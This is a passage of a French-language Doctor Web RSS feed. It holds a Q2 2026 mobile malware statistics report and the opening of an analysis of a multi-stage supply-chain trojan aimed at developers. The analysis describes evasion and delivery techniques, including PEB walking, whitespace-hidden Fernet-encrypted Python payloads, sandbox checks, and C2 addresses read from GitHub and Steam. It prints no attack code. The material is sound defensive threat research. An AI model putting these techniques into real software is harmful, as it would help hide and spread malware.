&lt;p&gt;Pour en savoir plus sur la situation virale et les menaces ciblant les appareils mobiles au deuxième trimestre 2026, consultez notre &lt;a href="https://news.drweb.fr/show/review/?i=15274" target="_blank"&gt;Rapport&lt;/a&gt;.&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15274&amp;lng=fr</guid><title>Doctor Web : rapport viral sur les menaces pour appareils mobiles du 2e trimestre 2026</title><link>https://news.drweb.fr/show/?i=15274&amp;lng=fr&amp;c=5</link><pubDate>Mon, 13 Jul 2026 13:16:34 GMT</pubDate><description>&lt;p&gt;le 13 juillet 2026&lt;/p&gt;

&lt;p&gt;&lt;newslead&gt;Selon les statistiques de détection de Dr.Web Security Space pour les appareils mobiles, au deuxième trimestre 2026, l'activité des chevaux de Troie bancaires &lt;a href="https://vms.drweb.fr/search/?q=Android.Banker&amp;lng=fr"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; a diminué de 31,83 % par rapport au premier trimestre. Cependant, ils restent les logiciels malveillants les plus courants ciblant Android, représentant 23,28 % des détections de ce type de menace. Ces logiciels malveillants dérobent diverses données confidentielles, telles que des SMS contenant des codes à usage unique provenant d'établissements de crédit, des identifiants et mots de passe de comptes bancaires en ligne.  Ils peuvent également afficher des fenêtres de phishing. 
Comme au trimestre précédent, les utilisateurs ont le plus souvent rencontré la sous-famille &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, qui comprend diverses applications malveillantes.
&lt;/newslead&gt;&lt;/p&gt;

&lt;p&gt;Au cours des trois derniers mois, l'activité des chevaux de Troie publicitaires des familles &lt;a href="https://vms.drweb.fr/search/?q=Android.MobiDash&amp;lng=fr"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; a continué de diminuer. Cependant, ils figurent toujours parmi les applications Android malveillantes les plus fréquemment rencontrées, et certaines de leurs variantes se classent encore parmi les plus détectées.&lt;/p&gt;

&lt;p&gt;Les logiciels potentiellement dangereux les plus courants, représentant plus de 66 % des cas, étaient, une fois encore, des programmes dans lesquels du code inutile avait été ajouté pour obscurcir la logique (ils sont détectés comme &lt;a href="https://vms.drweb.fr/search/?q=Tool.Obfuscator.TrashCode&amp;lng=fr"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;). 
Cette modification est effectuée à l'aide d’outils de piratage pour le modding de NP Manager. Ces outils sont également utilisés par les cybercriminels pour protéger les logiciels malveillants, tels que le cheval de Troie bancaire &lt;b&gt;Android.Banker.Mamont&lt;/b&gt;, contre la détection par les logiciels antivirus.
&lt;/p&gt;

&lt;p&gt;En deuxième position, on trouve les applications également modifiées à l'aide de l'utilitaire NP Manager, mais en exploitant d'autres fonctionnalités. Cet outil comprend notamment divers modules permettant de protéger et d'obfusquer le code source, ainsi que de contourner la vérification de signature numérique après modification des applications. Les auteurs de virus utilisent cette fonctionnalité pour protéger les logiciels malveillants contre la détection par les logiciels antivirus. Les produits antivirus Dr.Web détectent les programmes modifiés de cette manière, comme &lt;a href="https://vms.drweb.fr/search/?q=Tool.NPMod&amp;lng=fr"&gt;&lt;b&gt;Tool.NPMod&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Parmi les applications potentiellement dangereuses les plus courantes figuraient à nouveau des programmes modifiés à l'aide de l'utilitaire &lt;a href="https://vms.drweb.fr/search/?q=Tool.LuckyPatcher&amp;lng=fr"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;. Pour les modifier, l'utilitaire télécharge sur Internet des scripts spécialement préparés.&lt;/p&gt;

&lt;p&gt;Au deuxième trimestre, les programmes indésirables les plus actifs étaient des applications du type &lt;a href="https://vms.drweb.fr/search/?q=Program.FakeAntiVirus&amp;lng=fr"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;, qui imitent les logiciels antivirus. Elles prétendent détecter certaines menaces et proposent ensuite d'acheter une version complète pour les «&amp;nbsp;combattre&amp;nbsp;». Ces contrefaçons représentaient plus de 44 % des logiciels indésirables détectés sur les appareils Android.&lt;/p&gt;

&lt;p&gt;Le logiciel publicitaire le plus courant est constitué de modules &lt;a href="https://vms.drweb.fr/search/?q=Adware.AdPush&amp;lng=fr"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt; pouvant être intégrés aux applications Android. Ils affichent des publicités qui induisent les utilisateurs en erreur. Ces modules collectent également diverses données confidentielles. De plus, les utilisateurs continuaient de rencontrer des programmes d'optimisation &lt;a href="https://vms.drweb.fr/search/?q=Adware.Bastion&amp;lng=fr"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;. Ces programmes généraient régulièrement des notifications contenant des messages trompeurs concernant de prétendues erreurs système et une mémoire vive insuffisante. Ces applications affichent des publicités pendant l'«&amp;nbsp;optimisation&amp;nbsp;». Les programmes publicitaires &lt;b&gt;Adware.Opensite.15&lt;/b&gt; sont également restés très actifs. Les attaquants les présentent comme des applications de triche (cheat) pour les jeux qui permettraient d'obtenir des ressources dans les jeux, mais en réalité, les programmes ne chargent que des sites avec des publicités.&lt;/p&gt;

&lt;p&gt;Début juin, les spécialistes de Doctor Web ont signalé l'existence d'&lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt;, un cheval de Troie capable de contourner les restrictions du système d'exploitation Android et d'afficher des publicités en arrière-plan. Pour ce faire, &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; exploite des applications tierces et utilise des techniques spécifiques selon le fabricant de l'appareil infecté. Plus d'informations sur ce cheval de Troie sont disponibles dans &lt;a href="https://news.drweb.fr/show/?i=15262" target="_blank"&gt;l'article&lt;/a&gt; dédié sur notre site web.&lt;/p&gt;

&lt;p&gt;Au cours du deuxième trimestre, les analystes de Doctor Web ont découvert de nouveaux logiciels malveillants dans le catalogue Google Play, qui abonnaient les victimes à des services payants. Parmi eux se trouvent des Trojans des familles &lt;a href="https://vms.drweb.fr/search/?q=Android.Subscription&amp;lng=fr"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;div class="colorful"&gt;
    &lt;h3&gt;Tendances principales du deuxième trimestre&lt;/h3&gt;
    &lt;ul class="list"&gt;
        &lt;li&gt;Les Trojans bancaires &lt;a href="https://vms.drweb.fr/search/?q=Android.Banker&amp;lng=fr"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt; restent le malware le plus courant ciblant l'OS Android.&lt;/li&gt;
        &lt;li&gt;Les auteurs de virus ont continué à utiliser activement des outils de modification de logiciels Android pour protéger les chevaux de Troie bancaires contre la détection par les antivirus.&lt;/li&gt;
        &lt;li&gt;L'activité des chevaux de Troie publicitaires &lt;a href="https://vms.drweb.fr/search/?q=Android.MobiDash&amp;lng=fr"&gt;&lt;b&gt;Android.MobiDash&lt;/b&gt;&lt;/a&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; a de nouveau diminué.&lt;/li&gt;
        &lt;li&gt;Le cheval de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.MagicAd.1&amp;lng=fr"&gt;&lt;b&gt;Android.MagicAd.1&lt;/b&gt;&lt;/a&gt; a été découvert&amp;nbsp;; il utilise des applications tierces pour contourner les restrictions du système d'exploitation Android et afficher des publicités en arrière-plan.&lt;/li&gt;
        &lt;li&gt;De nouvelles applications malveillantes sont apparues sur Google Play.&lt;/li&gt;
    &lt;/ul&gt;
&lt;/div&gt;

&lt;h3&gt;Selon les données obtenues par Dr.Web Security Space pour les appareils mobiles&lt;/h3&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/01_malware_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/01_malware_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Android.Click&amp;lng=fr"&gt;&lt;b&gt;Android.Click&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1812&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Détection des mods malveillants de la messagerie WhatsApp, qui de manière invisible pour l'utilisateur peut charger différents sites en arrière-plan.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.675.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4236&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Trojan conçu pour afficher des publicités. Les représentants de la famille &lt;a href="https://vms.drweb.fr/search/?q=Android.HiddenAds&amp;lng=fr"&gt;&lt;b&gt;Android.HiddenAds&lt;/b&gt;&lt;/a&gt; sont souvent diffusés sous couvert d'applications inoffensives et, dans certains cas, ils sont installés dans le répertoire système par d'autres malwares. Une fois sur les appareils Android, ces chevaux de Troie publicitaires masquent généralement leur présence dans le système. Ils «&amp;nbsp;masquent&amp;nbsp;» l'icône de l'application dans le menu de l'écran d'accueil.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Android.Banker.Mamont.80.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Cheval de Troie bancaire qui intercepte les SMS contenant des codes à usage unique provenant d'établissements de crédit, le contenu des notifications et collecte d'autres informations confidentielles. Ces informations comprennent des données techniques sur l'appareil infecté, une liste des applications installées, des informations sur la carte SIM, ainsi que les appels téléphoniqueset les SMS reçus et envoyés.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Android.FakeApp&amp;lng=fr"&gt;&lt;b&gt;Android.FakeApp&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1600&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Cheval de Troie qui télécharge un site Web indiqué dans ses paramètres. Les modifications connues de cette application malveillante téléchargent un site Web du casino en ligne.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/02_unwanted_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/02_unwanted_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Program.FakeAntiVirus&amp;lng=fr"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Program.FakeAntiVirus&amp;lng=fr"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Program.FakeAntiVirus&amp;lng=fr"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.4.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Program.FakeAntiVirus&amp;lng=fr"&gt;&lt;b&gt;Program.FakeAntiVirus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Programmes publicitaires imitant le fonctionnement des logiciels antivirus. Ces programmes peuvent signaler des menaces inexistantes et tromper les utilisateurs en demandant de payer une version complète.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Program.FakeMoney&amp;lng=fr"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Applications qui permettent prétendument de gagner de l'argent en effectuant certaines actions ou tâches. Elles imitent l'accumulation de récompenses, alors que pour retirer l'argent «&amp;nbsp;gagné&amp;nbsp;», il est nécessaire d'avoir accumulé un certain montant. Généralement, ils proposent une liste de systèmes de paiement et de banques populaires par lesquels il est prétendument possible de retirer des récompenses. Mais même lorsque les utilisateurs parviennent à accumuler un montant suffisant pour le retrait, les paiements promis ne sont pas effectués. Cette entrée de la base de données détecte également d'autres logiciels indésirables basés sur le code de tels programmes.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/03_riskware_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/03_riskware_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Tool.Obfuscator.TrashCode&amp;lng=fr"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Tool.Obfuscator.TrashCode&amp;lng=fr"&gt;&lt;b&gt;Tool.Obfuscator.TrashCode&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Détection des applications Android ayant subi une injection de code malveillant à l'aide d'outils de modding d'applications utilisés par des pirates informatiques. Cette modification vise à masquer la logique du programme. Cette technique est fréquemment utilisée dans les chevaux de Troie bancaires et les versions piratées de logiciels.&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.3&lt;/b&gt;&lt;/dt&gt;
    &lt;dt&gt;&lt;b&gt;Tool.NPMod.1&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Détection des applications Android modifiées à l'aide de l'utilitaire NP Manager. Cet utilitaire contient divers modules permettant d'obfusquer et de protéger le code du programme, ainsi que de contourner la vérification de leur signature numérique après modification. L'obfuscation qu'elle ajoute est souvent utilisée dans les logiciels malveillants pour les rendre plus difficiles à détecter et à analyser.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Tool.LuckyPatcher&amp;lng=fr"&gt;&lt;b&gt;Tool.LuckyPatcher&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Utilitaire qui permet de modifier les applications Android installées (créer des correctifs pour elles) afin de changer la logique de leur fonctionnement ou de contourner certaines restrictions. Avec son aide, les utilisateurs peuvent notamment essayer de désactiver la vérification de l'accès root dans les programmes bancaires ou obtenir des ressources illimitées dans les jeux. Pour créer des correctifs, l'utilitaire télécharge des scripts spécialement préparés sur Internet, que quiconque peut créer et ajouter à la base de données commune. La fonctionnalité de ces scripts peut également être malveillante, c'est pourquoi les correctifs créés peuvent constituer un danger potentiel.&lt;/dd&gt;
&lt;/dl&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/04_adware_q2_2026_en.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/04_adware_q2_2026_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;dl&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Adware.Bastion&amp;lng=fr"&gt;&lt;b&gt;Adware.Bastion&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Détection des programmes d'optimisation qui créent périodiquement des notifications contenant des messages trompeurs concernant une mémoire insuffisante et des erreurs système supposées, afin d'afficher des publicités pendant «&amp;nbsp;l'optimisation&amp;nbsp;».&lt;/dd&gt;
    &lt;dt&gt;&lt;b&gt;Adware.Opensite.15&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Des applications déguisées en outils de triche pour obtenir des ressources dans les jeux. En réalité, elles sont conçues pour afficher des publicités. Ces programmes reçoivent une configuration d'un serveur distant, selon laquelle ils chargent un site web cible avec des publicités (bannières, pop-ups, vidéos, etc.).&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Adware.AdPush&amp;lng=fr"&gt;&lt;b&gt;Adware.AdPush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Module publicitaire pouvant être intégré à des applications Android. Il affiche des publicités qui induisent les utilisateurs en erreur. Par exemple, ces notifications peuvent ressembler aux messages du système d'exploitation. De plus, le module collecte un certain nombre de données confidentielles, et est également capable de télécharger d'autres applications et d'initier leur installation.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Adware.Fictus&amp;lng=fr"&gt;&lt;b&gt;Adware.Fictus&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Module publicitaire que les pirates intègrent dans des versions clonées de jeux et d'applications Android populaires. Son intégration dans les programmes se fait à l'aide d'un packer spécialisé net2share. Les copies du logiciel ainsi créées sont distribuées via divers répertoires d'applications et affichent des publicités indésirables après l'installation.&lt;/dd&gt;
    &lt;dt&gt;&lt;a href="https://vms.drweb.fr/search/?q=Adware.Airpush&amp;lng=fr"&gt;&lt;b&gt;Adware.Airpush&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.7.origin&lt;/b&gt;&lt;/dt&gt;
    &lt;dd&gt;Modules publicitaires qui sont intégrés dans des applications Android et affichent différentes publicités. Selon leur version et modification, il peut s'agir de publicités, de pop-ups ou de bannières. A l'aide de ces modules, les pirates distribuent souvent des malwares en proposant d'installer des applications. De plus, de tels modules transmettent diverses informations confidentielles à un serveur distant.&lt;/dd&gt;
&lt;/dl&gt;

&lt;h3&gt;Menaces sur Google Play&lt;/h3&gt;

&lt;p&gt;Au cours du deuxième trimestre 2026, les analystes de virus de Doctor Web ont découvert plusieurs nouveaux chevaux de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Subscription&amp;lng=fr"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt; dans le catalogue Google Play qui abonnent les utilisateurs à des services payants. Ils étaient distribués sous le couvert de divers logiciels&amp;nbsp;: le cinéma en ligne ShowLounge - TV &amp; Dramas (&lt;a href="https://vms.drweb.fr/search/?q=Android.Subscription&amp;lng=fr"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.25&lt;/b&gt;), les programmes pour joueurs AIM&amp;nbsp;: Crosshair Asist (&lt;a href="https://vms.drweb.fr/search/?q=Android.Subscription&amp;lng=fr"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.26&lt;/b&gt;), les jeux True Cargo Drive (&lt;a href="https://vms.drweb.fr/search/?q=Android.Subscription&amp;lng=fr"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.27&lt;/b&gt;), les utilitaires Battery 3D: Charge Effects (&lt;a href="https://vms.drweb.fr/search/?q=Android.Subscription&amp;lng=fr"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.28&lt;/b&gt;) et l'éditeur d'image PixStudio - Photo Editor (&lt;a href="https://vms.drweb.fr/search/?q=Android.Subscription&amp;lng=fr"&gt;&lt;b&gt;Android.Subscription&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.29&lt;/b&gt;). Au total, ils ont été téléchargés au moins 2&amp;nbsp;600&amp;nbsp;000 fois.&lt;/p&gt;

&lt;div class="img img-two-v same-height"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/05_Android.Subscription.26_GP.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/05_Android.Subscription.26_GP.1.png"&gt;
    &lt;/a&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/06_Android.Subscription.29_GP.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/06_Android.Subscription.29_GP.1.png"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Exemples de chevaux de Troie &lt;b&gt;Android.Subscription&lt;/b&gt; détectés sur Google Play au deuxième trimestre 2026&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Ces applications malveillantes redirigent vers des sites web qui utilisent la technologie WapClick pour connecter les internautes à des services mobiles payants. Les victimes potentielles sont invitées à saisir leur numéro de téléphone mobile, puis une tentative d'activation du service correspondant est effectuée.&lt;/p&gt;

&lt;p&gt;Les chevaux de Troie &lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;, qui abonnent également les victimes à des services payants, ont de nouveau été distribués sur Google Play. Les attaquants les ont fait passer pour des messageries instantanées Chat Messages (&lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2625&lt;/b&gt;) et Easy Messages (&lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2632&lt;/b&gt;), ainsi que pour des utilitaires d'optimisation système Smart File Cleaner, Junk Clean Master et Fast Cleaner (&lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2614&lt;/b&gt;, &lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2618&lt;/b&gt; et &lt;a href="https://vms.drweb.fr/search/?q=Android.Joker&amp;lng=fr"&gt;&lt;b&gt;Android.Joker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.2626&lt;/b&gt;, respectivement).&lt;/p&gt;

&lt;div class="img"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/07_Android.Joker.2632_1_Easy_Messages.png" data-fancybox&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2026/july/review_mobile_q2/07_Android.Joker.2632_1_Easy_Messages.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;L'une des applications malveillantes qui dissimulaient la famille de chevaux de Troie &lt;b&gt;Android.Joker&lt;/b&gt;&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;Pour protéger vos appareils Android contre les applications malveillantes et indésirables, nous vous recommandons d’installer les produits antivirus &lt;a href="https://products.drweb.fr/mobile/android/" target="_blank" rel="noopener"&gt;Dr.Web pour Android&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Q2%202026%20review%20of%20virus%20activity%20on%20mobile%20devices/README.adoc" target="_blank"&gt;Indicateurs de compromission&lt;/a&gt;&lt;/p&gt;</description></item><item><guid>https://news.drweb.fr/show/?i=15276&amp;lng=fr</guid><title>La cible : les développeurs. Un nouveau cheval de Troie s’attaque aux chaînes d’approvisionnement et provoque des dommages combinés aux ordinateurs infectés.</title><link>https://news.drweb.fr/show/?i=15276&amp;lng=fr&amp;c=5</link><pubDate>Fri, 10 Jul 2026 05:00:00 GMT</pubDate><description>&lt;p&gt;&lt;newslead&gt;Les spécialistes du laboratoire antivirus ont analysé un nouveau cheval de Troie. Il s'agit d'une menace de type supply chain attack, ciblant la chaîne d'approvisionnement logicielle. Ce logiciel malveillant se distingue notamment par son orientation vers les projets développés dans les langages de programmation C++ et C#. Une autre caractéristique est sa dangerosité élevée. Ce cheval de Troie combine plusieurs facteurs de dommage, exécutant simultanément plusieurs fonctions : voleur de cryptomonnaie, pirate informatique, porte dérobée, mineur de cryptomonnaie et source d’infection de fichiers.&lt;/newslead&gt;&lt;/p&gt;&lt;p&gt;Les premiers cas de propagation du cheval de Troie ont été enregistrés au dernier trimestre 2025 Depuis, il a constamment été modifié par ses développeurs. Il se propage principalement sur Internet via des fichiers .exe et Python infectés. Le processus d'infection comporte plusieurs étapes&amp;nbsp;; examinons chaque étape et son objectif une par une.&lt;/p&gt;&lt;h3&gt;Étape 1. Trojan.DownLoader49.35384&lt;/h3&gt;&lt;p&gt;Les experts de Doctor Web ont découvert de nombreuses applications légitimes infectées présentant une structure similaire. Un objet global est ajouté au fichier exécutable d'origine, et l'application piégée démarre son exécution en accédant aux API système via la méthode PEB walking. Ensuite, la fonction initterm standard parcourt la table des pointeurs de fonction et les initialise, où l'une de ces fonctions est malveillante et exécute la commande PowerShell. Dans certaines versions du cheval de Troie, cette charge utile est stockée sous forme chiffrée.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/1_VIR-DevRunTime-220526-1613-12.pdf-image-000.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Lancement via initterm&lt;/i&gt;&lt;/p&gt;&lt;p&gt;La commande PowerShell télécharge et exécute le fichier malveillant&amp;nbsp;&lt;a href="https://vms.drweb.fr/search/?q=Trojan.DownLoader49.35687&amp;lng=fr"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;, ce qui signifie la deuxième étape.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/2_VIR-DevRunTime-220526-1613-12.pdf-image-002.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Commande malveillante PowerShell&lt;/i&gt;&lt;/p&gt;&lt;p&gt;En plus des fichiers exécutables, des fichiers en langage Python (&lt;strong&gt;Python.Downloader.255&lt;/strong&gt;) ont été trouvés. Dans ceux-ci, le même code malveillant était crypté à l'aide du mécanisme de cryptage symétrique Fernet. Il est caché derrière un simple obscurcissement – de nombreux espaces sur la première ligne. Dans ce cas, l'exécution se déroule également en plusieurs étapes.&lt;/p&gt;&lt;div class="img"&gt;&lt;a href="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.png" data-fancybox=""&gt;&lt;img src="https://st.drweb.fr/static/new-www/news/2026/july/trojan_downloader/3_VIR-DevRunTime-220526-1613-12.pdf-image-004.1.png" alt="#drweb"&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;&lt;p class="text-center"&gt;&lt;i&gt;Fichiers malveillants Python&lt;/i&gt;&lt;/p&gt;&lt;h3&gt;Étape 2. Trojan.DownLoader49.35687&lt;/h3&gt;&lt;p&gt;À ce stade,&amp;nbsp;&lt;a href="https://vms.drweb.fr/search/?q=Trojan.DownLoader49.35687&amp;lng=fr"&gt;&lt;b&gt;Trojan.DownLoader49.35687&lt;/b&gt;&lt;/a&gt;&amp;nbsp;effectue une vérification de son lancement dans le bac à sable. De plus, il crée un objet de synchronisation mutex nommé Global\PFNMX(valeur fixe). Un exemple d'un tel objet&amp;nbsp;: &lt;span class="string"&gt;\Sessions\1\BaseNamedObjects\Global\PFNMX_0o6u9MMc2QdKvqeHmgPRE008&lt;/span&gt;. Le cheval de Troie vérifie ainsi si une autre copie a déjà été lancée sur l'ordinateur.&lt;/p&gt;&lt;p&gt;A la deuxième étape, le Trojan tente d'obtenir les adresses du serveur de commande et de contrôle (C2) via les dépôts GitHub publics et la plateforme de jeux Steam. Les attaquants y laissent des noms de domaine, que le cheval de Troie lit et utilise comme URL pour télécharger la troisième étape&amp;nbsp;: le cheval de Troie &lt;strong&gt;BackDoor.Siggen2.5906&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;Les comptes Steam 